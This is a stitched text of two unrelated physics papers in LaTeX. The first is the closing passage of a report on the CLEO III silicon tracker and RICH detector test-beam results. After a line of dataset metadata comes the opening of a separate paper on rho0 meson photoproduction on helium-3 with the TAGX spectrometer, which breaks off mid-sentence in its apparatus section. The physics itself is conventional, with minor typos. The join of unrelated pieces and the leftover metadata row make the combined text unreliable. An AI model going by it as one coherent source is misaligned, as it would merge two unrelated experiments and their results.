silicon sensor was inserted in a silicon telescope composed of 8 microstrip reference planes
defining the track impact parameters with a precision of about 2 $\mu$m. Two data sets were
collected. The first one contains 300,000 events with tracks at normal incidence and different
bias points. The second one consists of about 200,000 events at $\theta =0$
and
$\theta =10 ^{\circ}$.
\begin{figure}
\begin{center}
\vspace{-1.4cm}
\psfig{figure=fig_r877_res.ps,height= 3.5in}
\vspace{-1.7cm}
\caption{Residual distribution with $\eta$ algorithm at $V_{bias}$=100 V and
$V_{pstop}=20 V$.}
\end{center}
\label{fig:resol}
\end{figure}
The probability distribution of the variable $\eta$
defined as $\eta =Q_L/(Q_L+Q_R)$ (referring to the relative location of
two adjacent strips where at least one of them recorded a hit) has
been mapped and has been used in a non-linear charge
weighting to reconstruct the track hit location.~\cite{weil} Fig.~1 shows
the hit resolution achieved on the n-side with a detector bias of 100 V and
a p-stop reverse bias of 20 V. A value of $\sigma$ of 6 $\mu$m is quite impressive for a track
at normal incidence. The expectation for a 50 $\mu$m strip pitch is about
9 $\mu$m, as the charge spreading due to diffusion does
not provide appreciable signal in the neighboring strip unless the
track impact point is at the periphery of the strip. The higher resolution
achieved in this case is attributed to an increase in charge spread due to the
reverse biased p-stops. In fact the ability to modulate the reverse bias of the
p-stops has allowed the tuning of this charge sharing for optimum
resolution and may be of interest for other applications.
\section{Description of the CLEO III RICH System}
The CLEO III RICH system is based on the `proximity focusing' approach, in
which
the Cherenkov cone, produced by relativistic particles crossing a LiF radiator,
is let to expand in a volume filled with gas transparent to
ultraviolet light before intersecting a photosensitive detector where the
coordinates of the Cherenkov photons are reconstructed. The photodetector is amultiwire proportional chamber filled with a mixture of Triethylamine (TEA) gas
and Methane. The TEA molecule has good quantum efficiency (up to 35\%) in
a narrow wavelength interval between 135 and 165 nm and an absorption length of
only 0.5 mm.
The position of the photoelectron emitted by the TEA molecule
upon absorption of the Cherenkov photon is detected by sensing the induced
charge on an array of $7.6{\rm mm} \times 8 $ mm cathode pads. The probability distribution for the charge in the avalanche initiated by a single photoelectron
is exponential at low gain. This feature implies that a low noise
front end electronics is crucial to achieve good efficiency. A dedicated
VLSI chip, called VA\_RICH, based on a very successful chip developed for
solid state application, has been designed and produced for our application
at IDE AS, Norway. We have acquired and characterized all the hybrids necessary
to instrument the whole RICH detector, a total of 1800 hybrids containing
two VA\_RICH chips each, corresponding
230,400 readout channels. We have fully characterized all of them and for
moderate values of the input capacitance $C_{in}$, the equivalent noise
charge $ENC$ is found to be about:
\begin{equation}
ENC = 130 e^- + (9e^- /pF)\times C_{in}.
\end{equation}
The traces that connect the cathode pads with the input of the preamplifier in
the VA\_rich are rather long and the expected value of $ENC$ in absence of
other contribution is of the order of 200 $e^-$.
The charge signal is transformed into a differential current output transmitted
serially by each hybrid to a remote data acquisition board, where the currents
are transformed into voltages by transimpedance amplifiers and then digitized by
a 12 bit flash-ADC capable of digitizing the voltage difference at its input.
The data boards perform several additional complex functions, like providing
the power supply and bias currents necessary for the VA\_RICH to be at its optima
working point. In addition, the digital component of these boards provides
sparsification, buffering and memory for pedestal and threshold values.
If a track crosses the LiF radiator at normal incidence, no light is emitted
in the wavelength range detected by TEA, due to total internal reflection.
In order to overcome this problem a novel radiator geometry has been
proposed.~\cite{alex} It involves cutting the outer surface of the radiator like the
teeth of a saw, and therefore is referred to as ``sawtooth radiator''. A detailed
simulation of several possible tooth geometries has been performed and a
tooth angle of 42$^{\circ}$ was found out to be close to optimal and technically
feasible.~\cite{alex}
There are several technical challenges in producing these radiators, including
the ability of cutting the teeth with high precision without cleaving the
material and polishing this complex surface to yield good transmission properties
for the ultraviolet light. One of the goals of the test beam run described below
was to measure the performance of sawtooth radiators and we were able to produce
two full size pieces working with OPTOVAC in North Brookfield, Mass. The
light transmission properties of these two pieces were measured relative to a
plane polished sample of LiF and found to be very good.~\cite{icfa}
\section{Test beam results}
Two completed CLEO III RICH modules were taken to Fermilab and exposed
to high energy muons emerging from a beam dump. Their momentum was $\ge$ 100 GeV/c
The modules were mounted on a leak tight aluminum box with the same mounting
scheme planned for the modules in the final RICH barrel. One plane radiator and
the two sawtooth radiators were mounted inside the box at a distance from the
photodetectors equal to the one expected in the final system. Two sets of multiwire
chambers were defining the $\mu$ track parameters and the trigger was
provided by an array of scintillator counters. The data acquisition system was
a prototype for the final CLEO system.
The beam conditions were much worse than expected: the background
and particle fluxes were about two order of magnitude higher than we expect
in CLEO and in addition included a significant neutron component that is going
to be absent in CLEO. Data were taken corresponding to different track incidence
angles and with tracks illuminating the three different radiators. For the
plane radiator, we were able to configure the detector so that the photon
pattern would appear only in one chamber. For the sawtooth radiator a
minimum of three chambers would have been necessary to have full acceptance.
The study of this extensive data sample has been quite laborious and the full
set of results is beyond the scope of this paper. The results from two typical
runs will be summarized in order to illustrate the expected performance from our system:
the first case will involve tracks incident at 30$^{\circ}$ to the plane
radiator and the second tracks incident at 0$^{\circ}$ on a sawtooth radiator.
\begin{figure}
\begin{center}
\vskip 0.5cm
\psfig{figure=reso_vs_ng_flat.ps,height= 3.5 in}
\vspace{-1.0cm}
\caption{The Cherenkov angular resolution per track as a function of the number
of detected photons (background subtracted) for a plane radiator with tracks
at 30$^{^\circ}$ incidence.}
\end{center}
\label{fig:sngf}
\end{figure}
\begin{figure}
\begin{center}
\vspace{0.8cm}
\psfig{figure=reso_vs_ng_sawt.ps,height= 3.5 in}
\vspace{-2.0cm}
\caption{The Cherenkov angular resolution per track as a function of the number
of detected photons (background subtracted) for a sawtooth radiator with tracks
at normal incidence.}
\end{center}
\label{fig:sngs}
\end{figure}
The fundamental quantities that we study to ascertain the expected performance
of the system are the number of photons detected in each event and the angular
resolution per photon. The measured distributions are compared with the predictions of
a detailed Monte Carlo simulation, including information on the CH$_4$-TEA
quantum efficiency as a function of wavelength, ray tracing, crystal transmission, etc.. It includes also a rudimentary model of the background, attributed
to out of time tracks. The agreement between Monte Carlo
and data is quite good. The average number of detected photoelectrons is about
14 after background subtraction and the angular resolution per photon is
about 13.5$\pm$ 0.2 mr.
The average number of photons, after background subtraction, is
13.5, with a geometrical acceptance of only 55\% of the final system. In this
case it can be seen that the expected resolution is slightly better than
the one achieved. In order to estimate the particle identification power in our system,
we need to combine the information provided by all the Cherenkov photons in
an
event. We can use the resolution on the mean Cherenkov angle per track as an estimator
for the resolving power in the final system.
\begin{table}
\begin{center}
\caption{Summary on the performance of the RICH modules in two typical
test beam runs. The symbol $\gamma$ refers to single photon
distributions and the symbol $t$ refers to quantities averaged
over the photons associated with a track.}\label{tab:smtab}
\vspace{0.5cm}
\begin{tabular}{|c|c|c|}
\hline
\raisebox{0pt}[12pt][6pt]{Parameter} &
\raisebox{0pt}[12pt][6pt]{Plane Radiator} &
\raisebox{0pt}[12pt][6pt]{Sawtooth Radiator} \\
\raisebox{0pt}[12pt][6pt]{~~}&
\raisebox{0pt}[12pt][6pt] {($30^{\circ}$)}&
\raisebox{0pt}[12pt][6pt] {($0^{\circ}$)} \\
\hline
$\sigma _{\gamma}$ & 13.5 mr & 11.8 mr\\
$<N_{\gamma }>$ & 15.5 & 13.5 \\
$\sigma _t$ & 4.5 mr & 4.8 mr \\
$\sigma _t (MC)$& 3.9 mr & 3.8 mr \\
$\sigma _t (CLEO)$ & 4.0 mr & 2.9 - 3.8 mr\\
\hline
\end{tabular}
\end{center}
\end{table}
\vspace*{3pt}
Table 1 shows a summary of the predicted and achieved
values of these variables in the two data sets discussed in this paper and in the corresponding
Monte Carlo simulation, as well as the expectations for the final system.
Fig.~2 shows the
measured resolution per track $\sigma _t$ as a function of the
background subtracted number
of photons detected for the flat radiator and Fig.~2 shows the
corresponding curve for the sawtooth radiator. The curves are
fit to the parameterization $(a/\sqrt{N_{ph}})^2+b^2$.
The data shown, although preliminary, show a good understanding of the system and give confidence that
the predicted level of efficiency versus resolution will be achieved in CLEO III. An active analysis
program is under way to study the additional data available.
\section{Conclusions}
Both the major systems for the CLEO III detectors are well under way. Test runs data support the
expectations of excellent performance of both the silicon tracker and the Ring Imaging Cherenkov
detector. This will lead to a quite exciting physics program expected to start in 1999.
\section{Acknowledgements}
The author would like to thank her colleagues in the CLEO III Si3 and RICH groups for their excellent work
reported in this paper. Especially noteworthy were P. Hopman, H. Kagan, I. Shipsey and M. Zoeller for their help in
collecting the information relative to the Si3 tracker, S. Anderson, S. Kopp, E. Lipeles R. Mountain, S. Schuh, A. Smith,
T. Skwarnicki, G. Viehhauser
that were instrumental to a successful test beam run. Special thanks are due to C. Bebek and S. Stone for their
help throughout the length of the RICH project.
\section*{References}
| 2024-02-18T23:40:14.354Z | 1998-11-18T19:07:33.000Z | algebraic_stack_train_0000 | 1,774 | 2,621 |
|
proofpile-arXiv_065-8718 | \section{Introduction}
\label{sec:intro}
Hadronic dynamics have until recently been comprising of two
non-overlapping domains, distinctly separated along the lines of their
respective description of matter as hadronic or quark. On the
low-energy side of the spectrum, matter is probed on a scale where
pions and baryonic resonances are the relevant constituents. These
have been rather succesfully employed by quasi-phenomenological models
in providing prescriptions for free and in-medium hadronic
interactions. At the higher-energy end, far above energies typical of
baryonic resonances, quark degrees of freedom become accessible and
matter tends asymptotically towards quark-gluon plasma. In this
regime, described by perturbative QCD, quarks become deconfined and
chiral symmetry is restored.
Although the origin of quark confinement is not known, it is evident
that, whatever the reasons, it must induce spontaneous breaking of
chiral symmetry \cite{casher}. The two phenomena are therefore linked
and in the limit of chiral symmetry restoration, as quark masses tend
to zero, vector-meson masses and widths are also expected to change
\cite{pisar}. The transition from hadronic to quark matter and the
effect of increasing density and temperature on the properties of
light vector mesons have been addressed in the context of QCD sum
rules \cite{hat} as well as effective Lagrangians \cite{geb1}. In
particular, a temperature and density dependent lowering of the
$\rho^0$ mass is regarded as a precursor of the chiral phase
transition, expected to be measurable even at normal nuclear density
\cite{geb2}. Thus, the energy region from hadronic phenomenology to
the domain of perturbative QCD has come to the foreground, as the
study of vector-meson property modifications in this range appears to
be holding the key to understanding the mechanism of chiral symmetry
restoration.
The recent advent of high duty-cycle photon beams, on one hand, and
high-resolution dilepton spectrometers, on the other, have opened up
the possibility of reconciliation between the hadronic and quark
depictions of matter. Hadronic probes coupled with hadron
spectrometers had been extensively used in the past for energies up to
the $\Delta$ resonance, but higher-up, where multi-pion production
channels increasingly dominate, the combination becomes rapidly
cumbersome due to medium distortions from initial and final state
interactions. For the study of the vector mesons that couple to
multi-pion states, the photon is ideally suited. The recognition of
the electromagnetic interaction as an indispensable probe at either
the entrance or the exit channel, if the vector-meson field in the
nuclear medium is to be delineated, has generated activity in a
variety of fields.
\subsection{Relativistic Heavy Ion Results}
At relativistic energies, under extreme conditions of temperature and
density, the quest for signs of a phase transition from hadronic
matter to quark-gluon plasma is at the heart of experimental programs
using heavy-ion beams (e.g. at CERN, GSI, and RHIC) and dilepton
spectrometers. A series of pioneering studies from the CERES,
HELIOS-3, and NA50 colaborations at SPS/CERN with central S + Au, S +
W, Pb + Au, and Pb + Pb collisions, have largely been interpreted as
indicative of a downward shift of the $\rho^0$ mass in the nuclear
medium \cite{ceres,he3}. The invariant mass spectra for dilepton
production that have been measured in these experiments, when compared
with the respective p-A spectra, show a large enhancement at low
invariant mass regions. The excess dileptons are thought to originate
from the decay of mesonic resonances produced in $\pi^+\pi^-$
annihilation and, in the mass region 0.2$<$m$_{l^+l^-}<$0.5 GeV/c$^2$,
the models advocating vector-meson medium modifications attribute the
enhancement to the decay of the $\rho^0$ meson with a downward-shifted
mass \cite{geb3,cas}. Nonetheless, an explanation in terms of
conventional phenomenological $\rho^0$-meson medium modifications is
also consistent with the CERN data \cite{chanfray,ccf,friman}. In
this more conservative approach, the $\rho^0$ spectral function below
0.6 GeV/c$^2$ in dilepton invariant mass is appreciably enhanced from
the contributions of ``rhosobar''-type excitations such as the $\Delta
N^{-1}$, N$^*$(1720)N$^{-1}$ and $\Delta^*(1905) N^{-1}$, a
consequence of the strong coupling of the $\rho^0$ meson with
$\pi^+\pi^-$ states in the nuclear medium. This being the case, the
downward shift of the $\rho^0$-meson mass in the nuclear medium may
amount to no more than a convenient parametrization
\cite{chanfray}.
From a theoretical perspective, a model combining chiral SU(3)
dynamics with vector-meson dominance in an effective Lagrangian has
shown that chiral restoration does not demand a drastic reduction of
vector-meson masses in the nuclear medium \cite{weise}. The latter
model, in qualitative agreement with the hadronic-phenomenological
models \cite{chanfray,friman}, predicts a substantial enhancement of
the $\rho^0$ spectral density below the nominal resonance mass, with
only a marginal mass reduction. This result is tantamount to the
$\rho^0$ dissolving in the medium. Moreover, both an interpretation of
the CERES data as the outcome of either medium-modified hadronic
interactions, or interactions of dissociated quarks in the quark-gluon
phase, yield remarkably consistent results in the framework of
Ref.~\cite{weise}, leading to the conjecture that both the hadronic
and quark-gluon phases must be present \cite{weise}. The latter
conclusion is also drawn by a synthesis of the mass-scaling
\cite{geb2} and hadronic-phenomenological \cite{friman} models,
leading to the prediction that dynamical-hadronic effects that are
dominant up to about nuclear density, mainly via the highly-collective
N$^*$(1520)N$^{-1}$ state, gradually give way to $\rho^0$-meson mass
scaling as the quark degrees of freedom become increasingly
relevant. In the intermediate crossover region of ``duality'', both
the hadronic and quark-gluon phases of matter are expected to coexist
\cite{rwbr}. Thus, although a consensus has been reached on the issue
of coexistence of the hadronic and quark-gluon phases in the
transition region roughly placed upwards from $\sim$1~GeV, the
question remains as to the extent to which the nuclear medium induces
modifications to the $\rho^0$ mass and width.
Other less directly related experimental conjectures of medium
modifications of the $\rho^0$ mass have been deduced from an anomalous
J/$\psi$ suppression, reported by the NA50 collaboration for Pb + Pb
collisions \cite{jpsi}, enhanced K$^+$-$^{12}C$ scattering cross
sections \cite{kaons}, and an IUCF experiment of polarized proton
scattering on $^{28}$Si, though in the latter the medium
renormalization of the $\rho^0$ mass required for agreement with the
data is inconsistent for different observables measured in the same
experiment \cite{si}.
In summary, the experimental results discussed so far are inconclusive
with regard to the magnitude of the $\rho^0$-meson medium mass
modification, and underline the limitations encountered in complex
processes, where the probe interacts with nuclear matter via the
strong interaction and the channel being investigated may not be
disentangled from conventional medium effects.
\subsection{Electromagnetic Probe Results}
These difficulties are largely overcome with the use of photons which
do not suffer from initial state interactions. The availability of
high-flux photon beams, which have compensated for the low interaction
cross sections with nuclear matter, complemented by wide-angle
multi-particle spectrometers, have made possible a new generation of
experiments. In the E$_\gamma\sim$1 GeV region, matter is probed at
short distances $\le$1 fm, which is at the gateway of the energy range
where vector-meson properties are expected to undergo
modifications. In this domain, baryons and mesons are still the
relevant constituents for the description of matter, yet their quark
content becomes increasingly manifest, a fact which is reflected in
QCD-inspired phenomenological models \cite{isg,sai}. The $\rho^0$
meson is the best candidate among the light vector mesons
$\rho^{0,\pm}$, $\omega$, and $\varphi$ as a probe of medium
modifications, since, due to its short lifetime and decay length (1.3
fm), a large portion of $\rho^0$ mesons produced on nuclei will decay
in the medium.
For effective measurements with the photon as probe in the 1 GeV
region, kinematically complete experiments are required, which in turn
necessitate the use of high-duty-cycle tagged photon beams and
large-acceptance multi-particle spectrometers. These requirements were
met by the TAGX detector \cite{maru} at the Institute for Nuclear
Study (INS), where the TAGX collaboration has completed a series of
experiments with the ${^3}He$($\gamma$,$\pi^+\pi^-$)X reaction and a
10\% duty-cycle tagged photon beam. First, a lower-energy experiment
(380$\le$E$_\gamma\le$700 MeV) measured the single- and
double-$\Delta$ contributions to $\pi^+\pi^-$ production
\cite{watts}. Having established these important non-$\rho^0$ dipion
processes, the kinematics of the ${^3}He$($\gamma$,$\pi^+\pi^-$)X
reaction were investigated in the range 800$\le$E$_\gamma\le$1120 MeV,
aiming at the $\rho^0 \rightarrow \pi^+\pi^-$ channel.
Both the coherent and quasifree $\rho^0$ photoproduction mechanisms
are relevant in the energy region of interest. For a ${^3}He$ target,
the energy threshold for the former is E$_\gamma \approx$ 873 MeV,
whereas the 1.083~GeV energy threshold of the elementary $\rho^0$
photoproduction reaction on a nucleon is lowered for the quasifree
channel in the nuclear medium, as the Fermi momentum of the struck
nucleon may be utilized to bring the $\rho^0$ meson on shell. Coherent
photoproduction on nuclei is characterized by small four-momentum
transfers, resulting in $\rho^0$ mesons which mostly decay outside of
the nucleus \cite{crho}. The latter is, consequently, of limited
utility in probing vector-meson medium modifications.
In contrast, quasifree subthreshold photoproduction (E$_\gamma <$
1.083~GeV) on one hand warrants that the interaction took place in the
interior of the nucleus, since the nucleon Fermi momentum is required
to produce the $\rho^0$, and on the other produces slower $\rho^0$
mesons, more likely to also decay inside the nucleus. Moreover,
subthreshold photoproduction, whether the target nucleus remains bound
in the final state (exclusive channel) or decomposes to its
constituent nucleons (breakup channel), may be correlated with either
a nuclear mean-field or nucleonic medium effect on vector-meson
properties (Section~\ref{sec:int}). Specifically, exclusive
subthreshold photoproduction produces $\rho^0$ mesons which, on the
average, traverse distances comparable to the size of the nucleus
before their hadronic decay. This process is therefore a probe of
vector-meson medium modifications at normal nuclear densities, a
regime which has been the focus of mean-field driven theoretical
models. The breakup channel, on the other hand, is more likely to
produce $\rho^0$'s which are slower relative to the struck nucleon and
may travel distances shorteer than the nucleonic radius before decaying
(Section~\ref{sec:int}). Thus, large densities in the interior of the
nucleon may become accessible via the breakup channel, amounting to a
nucleonic medium effect. This is the realm of the emerging
hadronic-quark nature of matter, a domain virtually unexplored. In the
deep subthreshold region, and for large momentum transfers to the
target nucleus, the coherent and exclusive-quasifree channels are
suppressed, and the breakup-quasifree process becomes dominant. It is
the subthreshold dynamics that motivated the 800$\le$E$_\gamma\le$1120
MeV $\rho^0$ photoproduction experiment.
The aim of the experiment being as stated above, the choice of
${^3}He$ as the target becomes almost ideal. The low photon energies
utilized to induce subthreshold photoproduction result in slow
$\rho^0$ mesons with a small Lorentz boost, and therefore a large
probability for decay within the nuclear volume. Thus, in the case of
the exclusive channel, a large nuclear radius is not necessary, and
the larger nuclear density of a heavier target is predicted to have
only a marginally enhanced effect on the $\rho^0$ meson mass
\cite{sai}. Furthermore, if the breakup process is dominated by the
nucleonic field, the size of the target nucleus is
irrelevant. Finally, the ${^3}He$ target is the lightest nucleus where
a nuclear medium effect may be discernible, without the complexity of
overwhelming final state interactions (FSI).
The $\rho^0$ detection is further aided by the inherent selectivity of
the TAGX spectrometer (Section~\ref{sec:spec}) to coplanar
$\pi^+\pi^-$ processes \cite{maru}. This is due to the limited
out-of-plane acceptance of the spectrometer, which preferentially
selects the $\rho^0 \rightarrow \pi^+\pi^-$ channel, at the expense of
two-step processes (e.g. FSI) and uncorrelated $\pi^+\pi^-$ production
at distinct reaction vertices, the latter accounting for the majority
of non-$\rho^0$ background events (Section~\ref{sec:pcs}). This
favorable feature of the spectrometer promotes an otherwise small
component of the total amplitude, namely the subthreshold breakup
channel, to a sizeable experimental signal.
The mass of the $\rho^0$ meson in the nuclear medium was extracted
from the dipion spectra of the 800$\le$E$_\gamma\le$1120 MeV
experiment with the aid of Monte Carlo (MC) simulations
\cite{lolos}. The reported mass shift was far larger than the
predictions of any mean-field driven model pertaining to the exclusive
process for ${^3}He$ \cite{sai}; a calculation based on QHD assuming a
deep scalar potential yielding a $\rho^0$-${^3}He$ bound state, on the
other hand, produced much better agreement\cite{zisis}. The result of
Ref.~\cite{lolos} led to a reanalysis of the lower-energy measurements
\cite{watts} including the $\rho^0 \rightarrow \pi^+\pi^-$ channel,
and allowing for $\rho^0$ production with a shifted mass. The outcome
of this reanalysis was an even larger shift \cite{hub}, possibly
indicating a mechanism other than those previously considered. A
nucleonic medium effect, as sketched earlier, may be consistent with a
large $\rho^0$-mass reduction, although a theoretical model has yet to
be fully developed \cite{geb4,guic}. Though more work is needed to
firmly establish and better understand these results \cite{sp}, the
${^3}He$($\gamma$,$\pi^+\pi^-$)X experiment for photon energies in the
range 800$\le$E$_\gamma\le$1120 MeV constitutes the first direct
measurement of the $\rho^0$ mass in the nuclear medium. In this
report, a new and more thorough analysis is presented, including the
first direct evidence of the characteristic $J = 1$ signature of the
$\rho^0$ meson decay in the subthreshold region, as well as
refinements in the simulations and fitting procedure, relative to the
analysis of Refs.~\cite{watts,lolos,hub}, leading to higher confidence
in the extraction of the in-medium $\rho^0$ mass.
The paper is organized in six sections. In Section~\ref{sec:tagx},
the experimental set-up and the calibration procedure are reviewed. In
Section~\ref{sec:anal} the data-analysis algorithm is outlined in
conjunction with the experimental aspects of
Section~\ref{sec:tagx}. Section~\ref{sec:mc} focuses on the MC
techniques and the fitting of the data, leading to the extraction of
the mass shift. In Section~\ref{sec:data} the data are compared
with the MC calculations, and the $\rho^0$ mass shifts are discussed.
Finally, the conclusions are presented in Section~\ref{sec:concl}.
\section{APPARATUS}
\label{sec:tagx}
The INS tagged photon beam and the TAGX spectrometer (Fig.~\ref{figtgx})
\cite{maru}, the new straw drift chamber \cite{gar}, and different
aspects of the data-analysis procedure \cite{maru,watts} have all been
described in detail elsewhere, where the reader is referred for a more
extensive discussion. In this section, a brief overview of the
experimental apparatus is provided, as it applies for the
${^3}He$($\gamma$,$\pi^+\pi^-$)X measurements, stressing the elements
that were either introduced for the first time in this experiment, or
that are important for the data analysis.
\subsection{Photon beam and ${^3}He$ target}
\label{sec:pb}
The photon beam is produced utilizing the 1.3 GeV Tokyo Electron
Synchrotron. A series of innovative technical improvements led in 1987
to the upgrading of the photon beam to one of medium duty cycle. In
the present experiment, the endpoint electron energy E$_s$ is 1.22 GeV
at an average 10\% duty factor, corresponding to a 5 ms extraction
time. The instantaneous energy of the extracted electrons has a
sinusoidal dependence, and it is known by measuring the extraction
time. The extracted electrons are directed via a beamline onto a thin
platinum radiator where bremsstrahlung photons are produced, while the
scattered electrons are bent away from the beam by a rectangular
analyzer magnet of 1.17 T. The magnet settings of the extraction
beamline vary sinusoidally in time, in phase with the E$_s$ energy.
An array of 32 scintillator electron-tagging counters, each with a 10
MeV/c momentum acceptance, detect the scattered electrons. The
position of the tagger registering the scattered electron determines
its energy, and consequently that of the bremsstrahlung photon as
E$_\gamma$ = E$_e$ - E$_{e'}$ with $\Delta$E$_\gamma\sim \pm$5~MeV
accuracy. A second set of 8 backing taggers participates in the
coincidence triggering signal, along with the 32 frontal ones, and
is discussed in the following section. The tagged photon intensity was
maintained at an average of $\sim$3.5 $\times$ 10$^5$ $\gamma$/s, well
within the tolerance of the data acquisition system for accidental
triggers. The photons, distributed over a beam spot of $\sim$2~cm in
diameter, are subsequently incident on a liquid ${^3}He$ target. The
target is at a temperature of 1.986$\pm$0.001 K, corresponding to a
0.0786 g/cm$^3$ density, and is contained in a cylindrical vessel 90
mm in height and 50 mm in diameter at the center of the TAGX
spectrometer \cite{target}.
The tagger hits are related to the photon flux incident upon the
target after efficiency corrections. In particular, due to the
collimation of the photon beam downstream from the taggers, some of
the tagged photons do not reach the target. To determine the tagging
efficiency, and consequently the photon flux, a lead-glass
$\breve{C}$erenkov counter is placed in the photon beam, with reduced
flux, downstream from the target and the tagger scalers are
periodically recorded both with and without the platinum radiator in
place. The efficiency per tagger counter is determined by the
relation
\begin{equation}
\eta_{\imath\in[1,32]}={ {\left[\breve{C}\cdot T_\imath\right]_{in}
- \left[\breve{C}\cdot T_\imath\right]_{out}
- \left[\breve{C}_{acc}\cdot T_\imath\right]_{in}
}\over{T_{\imath_{in}}
- T_{\imath_{out}}} }
\label{eta}\end{equation}
where $T_\imath$ is the scaler count for each of the frontal taggers.
The term $\left[\breve{C}\cdot T_\imath\right]_{out}$ corresponds to
the coincidences between a tagger-counter and a lead-glass
$\breve{C}$erenkov hit from a spurious photon not originating from the
platinum radiator, and $\left[\breve{C}_{acc}\cdot
T_\imath\right]_{in}$ is the number of accidental coincidences with
the radiator in place, but with the $\breve{C}$erenkov hit registering
with a delay of the order of 100~ns with respect to the tagger counter
signal. These two terms turn out to be negligible relative to the term
$\left[\breve{C}\cdot T_\imath\right]_{in}$ in Eq.~(\ref{eta}), which
gives the efficiency-corrected number of tagged photons per tagger
reaching the target as
\begin{equation}
N_{\imath\in[1,32]} = \eta_\imath T_{\imath_{in}} \left(1-{
{T_{\imath_{out}}\over{T_{\imath_{in}}}}}\right) \ .
\label{norm}\end{equation}
The efficiencies $\eta_\imath$ and radiator out/in ratios ${\cal
R_\imath}$ = $T_{\imath_{out}}/T_{\imath_{in}}$ for the 32 frontal
taggers are recorded in a number of dedicated runs, in regular
intervals throughout the experiment, and they are used, along with
Eq.~(\ref{norm}), in the empty-target background subtraction procedure
applied to the measured spectra (see Section~III).
\subsection{Spectrometer}
\label{sec:spec}
The TAGX spectrometer has an acceptance of $\pi$ sr for charged
particles (neutral-particle detection was not utilized in the present
experiment), and has been in use at INS since 1987. It consists of
several layers of detector elements (Fig.~\ref{figtgx}) positioned
radially outwards from the target vessel, which is located at the
center of the 0.5~T field of a dipole analyzer magnet.
Directly surrounding the target container is the inner hodoscope (IH),
made up of two sets of six scintillator counters, one on each side of
the beam. The IH is used in the trigger, as well as in measuring the
time of flight (TOF) of the outgoing particles \cite{maru,gar}. As it
is placed inside a strong magnetic field, the light signal is carried
by optical fibers to the photomultiplier tubes, which are located at
the fringes of the magnetic field two meters away.
Next is the straw drift chamber (SDC), operating since 1994 and
installed expressly for the measurement of the $\rho^0$ mass in
${^3}He$, with the objective of improving the momentum resolution for
the detection of the $\rho^0 \rightarrow \pi^+\pi^-$ decay channel
\cite{gar}. The SDC consists of two semi-circular cylindrical
sections, each containing four layers of vertical cells. The ``straw''
cells have tube-shaped cathodes which induce a radial electric field,
and consequently have a regular field definition and high position
resolution ($\sim$150~$\mu$m). The SDC was designed to preserve the
$\pi$-sr large acceptance prior to its installation, to not impose
extensive modifications of the spectrometer, and to not induce
significant energy losses to traversing particles by keeping its
thickness to minimum. The installation of the SDC required,
nonetheless, the replacement of the IH from an earlier set of
scintillators with the one described above.
Surrounding the SDC are two semicircular cylindrical drift chambers
(CDC) subtending angles from 15$^\circ$ to 165$^\circ$ on both sides
of the beamline in the horizontal plane, and $\pm$18.3$^\circ$ in
vertical out-of-plane angles. The CDC is composed of twelve concentric
layers of drift cells, yielding a $\sim$250-300~$\mu$m horizontal and
$1.5$~cm vertical resolution. Together with the SDC, they are used to
determine the planar momentum and emission angle of the charged
particles traversing them, and the vertex position of trajectory
crossings.
The outer set of 33 scintillator elements comes next, serving as the
outer hodoscope (OH), with PMT's attached at both ends to help
determine the track angle relative to the median plane. The two sets
of hodoscopes, IH and OH, measure the TOF corresponding to the tracked
trajectories.
Other components of the TAGX spectrometer include 4 sets of
155~mm~$\times$~50~mm~$\times$~5~mm $e^+e^-$ background veto counters
positioned along the OH arms in the median plane. The veto counters
eliminate charged-particle tracks registering within $\Delta z = \pm$
2.5 mm, mostly affecting forward-focused $e^+e^-$ pairs produced
copiously downstream from the target, but having a small effect on
$\pi^+\pi^-$ events.
\subsection{Data acquisition and calibration}
\label{sec:daq}
The channel of interest being $\pi^+\pi^-$ production from the decay
of the $\rho^0$ meson, two-charged particle coincidences on opposite
sides of the beam axis were required of the trigger. Two levels of
triggering are implemented in order to optimize the data acquisition
electronics. The pretrigger
\begin{equation}
{\cal PT}=IH_L\cdot IH_R \cdot \sum_{\imath=1}^8 TAG_{\imath_{back}} \cdot
{\overline {EM}}_{front}
\label{ptrig}
\end{equation}
is generated within 100~ns from the occurence of an event. A
coincidence of a left and right IH hit with a backing tagger hit is
required, and not rejected by the forward $e^+e^-$ veto counters. The
main trigger
\begin{equation}
{\cal MT}={\cal PT} \cdot OH_L\cdot OH_R \cdot \sum_{\imath=1}^{32}
TAG_{\imath_{front}} \cdot
{\overline{Inhibit}}
\label{mtrig}
\end{equation}
requires the coincidence of the pretrigger with a left and right OH
hit and a forward tagger hit, not rejected by the computer inhibit
signal. A window of 400~ns is available between the ${\cal PT}$ and
the ${\cal MT}$, after which the CAMAC is cleared for the next ${\cal
PT}$. Typical counting rates are 2~kHz and 30~Hz for the ${\cal PT}$
and ${\cal MT}$, respectively.
The calibration of the scintillation counters and the CDC and SDC have
been the subject of extensive effort \cite{maru,gar,iur}. More
recently, a series of modifications implemented in the track fitting
algorithms has resulted in significant improvements, mainly in the
planar-momentum resolution \cite{aki}. It is the tracking that is
discussed next.
The CDC consists of four groups of three-wire layers
(Fig.~\ref{figtgx}). The last layer of wires for each group was
intended for charge division readout and had not been employed in the
past \cite{maru}. Instead, hits from the eight remaining CDC layers
were used for the reconstruction of the planar momentum $p_{xy}$,
emission angle $\theta_{sc}$, and vertex position (see also
Section~\ref{sec:obs}). This earlier eight-layer tracking procedure
did not incorporate the SDC information either, thus resulting
altogether in a less-than-optimal momentum resolution. Since longer
effective lengths of reconstructed tracks result in higher-quality
fits, however, TDCs from the last layer of wires of the fourth group
has been implemented for the first time in the present analysis.
Furthermore, the SDC data have also been used for the first time, a
combination which yields an overall improvement in the planar momentum
resolution estimated to be $\sigma_{p_{xy}}$/p$_{xy}$ = 0.0892p$_{xy}$
+ 0.0057, compared with $\sigma_{p_{xy}}$/p$_{xy}$ = 0.1150p$_{xy}$ +
0.0078 from the 8-layer CDC analysis \cite{aki}. For a particle of
p$_{xy}$=300~MeV/c, this amounts to a 40\% improvement in the planar
momentum resolution. The corresponding improvement in the vertex
position is reflected in Fig.~\ref{figsdc}, and has allowed for more
stringent tests in the selection of two-track events which originate
from the target area. A minor improvement has also been noted in the
emission angle resolution, which stays relatively constant at
$\sigma_\varphi \sim$~0.3$^\circ$ throughout the range of typical
planar momenta 100 MeV/c $\le$ p$_{xy} \le$~500~MeV/c \cite{aki}.
The steps involved in the tracking of trajectories through the SDC and
CDC may be summarized in the following: The CDC TDCs operate in
``common-stop'' mode, with the start determined from each CDC sense
wire and the stop from the IH \cite{maru}. The CDC drift times are
first corrected by the corresponding TDC timing offsets. The
drift-length to drift-time relation is determined next, per layer of
CDC wires, as a fifth-order polynomial. This is an iterative process,
